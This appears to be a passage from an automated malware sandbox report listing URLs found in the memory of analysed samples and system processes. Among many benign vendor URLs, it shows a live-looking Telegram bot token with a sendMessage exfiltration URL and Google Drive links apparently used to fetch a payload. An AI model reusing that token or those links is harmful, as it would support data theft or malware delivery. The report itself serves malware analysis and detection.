                      Source: explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                      Source: explorer.exe, 00000014.00000003.3074284180.000000000D198000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                      Source: explorer.exe, 00000014.00000003.3074284180.000000000D198000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSdE
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: explorer.exe, 00000014.00000000.2216466843.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/$
                      Source: explorer.exe, 00000014.00000000.2216466843.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/X
                      Source: explorer.exe, 00000014.00000000.2202639819.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2204496366.0000000002FA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000014.00000000.2216466843.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2204496366.0000000002FA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                      Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/&
                      Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/-
                      Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/?tIH0
                      Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/Account
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/b
                      Source: t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o
                      Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D6459F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
                      Source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://api.telegram.org/botFailed
                      Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/m
                      Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/p
                      Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/r
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/v
                      Source: explorer.exe, 00000014.00000000.2216466843.0000000009390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comWzE
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: t5abhIx.exe, 0000000D.00000003.2162651119.0000026D6459B000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162621750.0000026D6457B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D6459B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore0
                      Source: dwVrTdy.exe, 0000000A.00000003.2051291870.000001CDE2B13000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051163209.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore8
                      Source: dwVrTdy.exe, 0000000A.00000003.2051453805.000001CDE2B21000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051426857.000001CDE2B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreE$
                      Source: AzVRM7c.exe, 0000000B.00000003.2098977782.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097400296.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097224191.000002E277417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreK
                      Source: t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162805710.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreL
                      Source: AzVRM7c.exe, 0000000B.00000003.2098977782.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097400296.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097224191.000002E277417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreY
                      Source: dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033786317.000001B9CE44E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034384469.000001B9CE456000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033639099.000001B9CE443000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorejjK
                      Source: dwVrTdy.exe, 00000009.00000003.2033916766.000001B9CE439000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033727970.000001B9CE435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore~
                      Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034309451.000001B9CE464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxBY
                      Source: AzVRM7c.exe, 0000000B.00000003.2097752416.000002E27742C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097624301.000002E27742A000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097888350.000002E277438000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097967560.000002E277446000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2099369210.000002E277450000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097821581.000002E277435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxD
                      Source: t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162982228.0000026D645BE000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxY
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                      Source: firefox.exe, 0000002C.00000002.2586946099.000001449CF11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsThe
                      Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE474000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE474000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                      Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE474000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/(
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/5
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/q
                      Source: dwVrTdy.exe, dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://drive.google.com/uc?id=
                      Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE474000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2AD8000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download-
                      Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE46B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadG
                      Source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://drive.google.com/uc?id=URL:
                      Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE4D8000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2143503842.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/8
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Z
                      Source: AzVRM7c.exe, 0000000B.00000003.2183605759.000002E2774C4000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      Source: dwVrTdy.exe, 00000009.00000003.2123112840.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2123248191.000001B9CE4AA000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B70000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2143503842.000001CDE2B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download-
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download/
                      Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download3
                      Source: dwVrTdy.exe, 00000009.00000003.2123112840.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2123248191.000001B9CE4AA000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadF
                      Source: dwVrTdy.exe, 00000009.00000003.2123112840.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2123248191.000001B9CE4AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadG
                      Source: dwVrTdy.exe, 00000009.00000003.2123112840.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2123248191.000001B9CE4AA000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadT
                      Source: dwVrTdy.exe, 00000009.00000003.2123112840.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2123248191.000001B9CE4AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadl
                      Source: dwVrTdy.exe, 0000000A.00000003.2143503842.000001CDE2B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadt
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadv
                      Source: firefox.exe, 0000002C.00000003.2501375547.00000144ACC77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: firefox.exe, 0000002C.00000002.2631442562.00000144AC439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                      Source: firefox.exe, 0000002C.00000002.2631442562.00000144AC439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sFailed
                      Source: explorer.exe, 00000014.00000003.3074284180.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comE
                      Source: firefox.exe, 0000002C.00000002.2633561715.00000144AC8C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsGetti
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1_scheduleBestEffortUserIdleTasks/
                      Source: firefox.exe, 0000002C.00000002.2610517942.00000144A9D3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
                      Source: be08f59021.exe, 00000016.00000003.3054113358.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.3054373991.000000000565C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g-cleanit.hk
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
                      Source: F0A3.tmp.ctx.exe, 00000027.00000002.2444899117.0000024335645000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2438058600.0000024335600000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2444169590.0000024335601000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                      Source: firefox.exe, 0000002C.00000003.2501375547.00000144ACC77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshotsexperiment-apis/matchPatterns.jsonexperiment-apis/sys
